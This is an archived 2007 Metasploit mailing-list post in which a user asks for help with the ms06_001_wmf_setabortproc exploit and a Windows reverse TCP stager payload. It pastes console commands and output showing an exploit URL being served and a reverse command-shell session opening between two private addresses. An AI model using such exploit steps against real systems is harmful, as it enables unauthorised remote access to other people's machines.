Metasploit mailing list archives

reverse TCP stager payload


From: black.gal007 at gmail.com (black gal)
Date: Mon, 10 Sep 2007 10:44:22 +0530

 Hi All
While testing a exploit "*ms06_001_wmf_setabortproc*" with payload *Windows
Command Shell, Reverse TCP Stager.* I cudn't get full access to the remote
machine. It showed the msg below and stopped there.

Can  anyone tell me whr's the problem lying?
**

msf exploit(ms06_001_wmf_setabortproc) > set LPORT 4444
LPORT => 4444
msf exploit(ms06_001_wmf_setabortproc) > exploit
[*] Started reverse handler
[*] Using URL: http://192.168.1.151:80/pJ3R3Jo<http://192.168.1.151/pJ3R3Jo>
[*] Server started.
[*] Exploit running as background job.
msf exploit(ms06_001_wmf_setabortproc) > [*] Sending stage (474 bytes)
[*] Command shell session 1 opened ( 192.168.1.151:4444 ->
192.168.1.104:1082)
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20070910/a8043113/attachment.htm>


Current thread: